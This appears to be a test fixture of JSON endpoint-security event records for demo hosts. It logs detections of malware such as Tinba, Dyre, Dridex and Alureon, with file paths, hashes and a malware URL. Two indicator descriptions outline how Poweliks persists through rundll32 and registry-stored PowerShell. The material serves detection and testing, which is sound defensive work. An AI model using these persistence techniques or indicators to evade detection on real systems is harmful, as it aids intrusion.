-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":706000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053698","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://dak1otavola1ndos.com/h/index.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":222000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053697","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617228531237000,"timestamp":1610705342,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:09:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617228531236865","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\My Documents\\Downloads\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415396303000800,"timestamp":1610705341,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.Variant:Tinba.15hl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705341,"start_date":"2021-01-15T10:09:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"bin.exe","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\Application Data\\default\\bin.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49","sha1":"194ada957926b985653f0400ede75175df6b48be","md5":"c141be7ef8a49c2e8bda5e4a856386ac"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":503000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086401","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Tinba.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Tinba.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256842453221000,"timestamp":1610705336,"timestamp_nanoseconds":643000000,"date":"2021-01-15T10:08:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256842453221429","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256790913614000,"timestamp":1610705324,"timestamp_nanoseconds":631000000,"date":"2021-01-15T10:08:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256790913613876","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256739374006000,"timestamp":1610705312,"timestamp_nanoseconds":619000000,"date":"2021-01-15T10:08:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256739374006323","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256687834399000,"timestamp":1610705300,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:08:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256687834398770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256636294791000,"timestamp":1610705288,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:08:08+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256636294791217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":559000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739226271700,"timestamp":1610705284,"timestamp_nanoseconds":226259000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Poweliks is a fileless click-fraud 
malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute javascript code to read Powershell from the Windows registry, which subsequently executes portable executable code in memory.","short_description":"W32.PoweliksPersistence.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739190653000,"timestamp":1610705284,"timestamp_nanoseconds":190644000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The rundll32 application is designed to run code present in DLLs. 
There is however a case where it can also be used in the same way as MSHTA to execute JavaScript code on the command-line.","short_description":"W32.rundll32RunHTMLApplication.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666334151016000,"timestamp":1610705283,"timestamp_nanoseconds":977000000,"date":"2021-01-15T10:08:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.B1380FD95B-100.SBX.TG","detection_id":"6533666334151016449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":3180,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sh
a1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256584755184000,"timestamp":1610705276,"timestamp_nanoseconds":957000000,"date":"2021-01-15T10:07:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256584755183664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709202491408000,"timestamp":1610705270,"timestamp_nanoseconds":802000000,"date":"2021-01-15T10:07:50+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209764771561000,"timestamp":1610705269,"timestamp_nanoseconds":265000000,"date":"2021-01-15T10:07:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209764771561497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256537510543000,"timestamp":1610705265,"timestamp_nanoseconds":319000000,"date":"2021-01-15T10:07:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256537510543407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":187000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841155","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55722,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 